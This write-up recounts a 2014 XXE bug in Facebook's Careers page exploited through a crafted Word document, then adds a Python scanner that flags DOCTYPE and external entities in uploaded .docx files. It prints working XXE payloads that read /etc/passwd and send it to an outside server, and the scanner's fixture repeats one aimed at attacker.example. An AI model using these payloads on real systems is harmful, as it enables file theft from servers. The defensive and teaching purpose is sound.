A Facebook XXE with Word

On December 29th, 2014, a bug bounty hunter named Mohamed Ramadan found an XXE vulnerability in the Facebook Careers page.

As you may remember, Office documents with the .docx extension are actually XML documents with a defined structure. Mohamed Ramadan included a custom DTD in the XML document.

A DTD defines how a document is structured: the order in which elements, attributes, entities and notations appear, how many times they may appear, and which ones are children and parents of which others. The real importance of the DTD is that the XML parser uses it to decide whether the document is valid or not.

So, Mohamed Ramadan uploaded a document, as follows:

<!DOCTYPE root [
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % dtd SYSTEM "http://197.xxx.xxx.90/ext.dtd">
%dtd;
%send;
]>

As you can read in the file, there are two important values:

  • The first is the path to the passwd file; it means that the document will extract this file, so any sensitive file you want to obtain can be put here.
  • The second is the IP address where the external DTD file is located; it is important because you need to be sure that you control that server so that the DTD can be placed on it. Because this vulnerability was exposed on the internet, that was not a problem here; however, attacking internal computers to extract credentials using XXE in Word documents is also a useful technique during a penetration test, where it is a bit more difficult because the reachable server is owned by the host.

The DTD file has the following lines:

<!ENTITY % all
"<!ENTITY &#x25; send SYSTEM 'http://197.xxx.xxx.90/FACEBOOK-HACKED?%file;'>"
>
%all;

With this DTD, Mohamed Ramadan validated the XML document.

The result is that, once the XML file was parsed, /etc/passwd was displayed.

Mohamed Ramadan also provided feedback to Facebook for mitigation. The problem was solved by modifying how Facebook calls the libxml_disable_entity_loader(true) method. The original test payload was this:

<!DOCTYPE test [ <!ENTITY xxeattack SYSTEM "file:///etc/passwd"> ]>
<xxx>&xxeattack;</xxx>

It was changed to this:

<!DOCTYPE scan [ <!ENTITY test SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd">]>
<scan>&test;</scan>

With the preceding code, the file is passed through the php://filter stream, which base64-encodes its contents before they are displayed on the screen.
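The defensive lesson from this report is that a legitimate Office document never needs a DOCTYPE, external entities or parameter-entity references inside its XML parts. The following pre-parse check, written as an added example (not code from the original write-up, Facebook, or the researcher), opens an uploaded .docx archive and flags any part carrying those constructs before an XML parser ever sees it. The minimal zip layout and the `attacker.example` host are constructed placeholders, not a real Word file or a real server.

```python
"""Pre-parse check for uploaded .docx files: flag any XML part that carries a
DOCTYPE, an external (SYSTEM/PUBLIC) entity declaration, or a parameter-entity
reference. Run this before handing the document to an XML parser."""
import io
import re
import zipfile

# Constructs a benign Office part should never contain.
DOCTYPE_RE = re.compile(rb"<!DOCTYPE\b", re.IGNORECASE)
EXTERNAL_ENTITY_RE = re.compile(
    rb"<!ENTITY\s+(?:%\s+)?\S+\s+(?:SYSTEM|PUBLIC)\b", re.IGNORECASE)
PARAM_ENTITY_REF_RE = re.compile(rb"%[A-Za-z_][\w.-]*;")


def scan_docx(data: bytes) -> list:
    """Return (part_name, reason) findings; an empty list means nothing suspicious."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            # Only the XML-based parts of the package are worth inspecting.
            if not name.lower().endswith((".xml", ".rels")):
                continue
            content = zf.read(name)
            if DOCTYPE_RE.search(content):
                findings.append((name, "DOCTYPE declaration present"))
            if EXTERNAL_ENTITY_RE.search(content):
                findings.append((name, "external entity declaration"))
            if PARAM_ENTITY_REF_RE.search(content):
                findings.append((name, "parameter entity reference"))
    return findings


def build_docx(document_xml: bytes) -> bytes:
    """Constructed stand-in for a .docx package: a zip with two XML parts."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", b'<?xml version="1.0"?><Types/>')
        zf.writestr("word/document.xml", document_xml)
    return buf.getvalue()


# Constructed samples: a clean document and one shaped like the reported payload.
BENIGN_DOCX = build_docx(
    b'<?xml version="1.0"?><w:document xmlns:w="x"><w:body/></w:document>')
MALICIOUS_DOCX = build_docx(
    b'<?xml version="1.0"?>\n<!DOCTYPE root [\n'
    b'<!ENTITY % file SYSTEM "file:///etc/passwd">\n'
    b'<!ENTITY % dtd SYSTEM "http://attacker.example/ext.dtd">\n'
    b'%dtd;\n%send;\n]>\n'
    b'<w:document xmlns:w="x"><w:body/></w:document>')

if __name__ == "__main__":
    print("benign:", scan_docx(BENIGN_DOCX))
    print("malicious:", scan_docx(MALICIOUS_DOCX))
```

A document that produces any finding should be rejected at upload time, independently of whether the parser behind it has entity loading disabled.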

If you want to read more about this bug, visit the following link: https://www.bram.us/2014/12/29/how-i-hacked-facebook-with-a-word-document/.
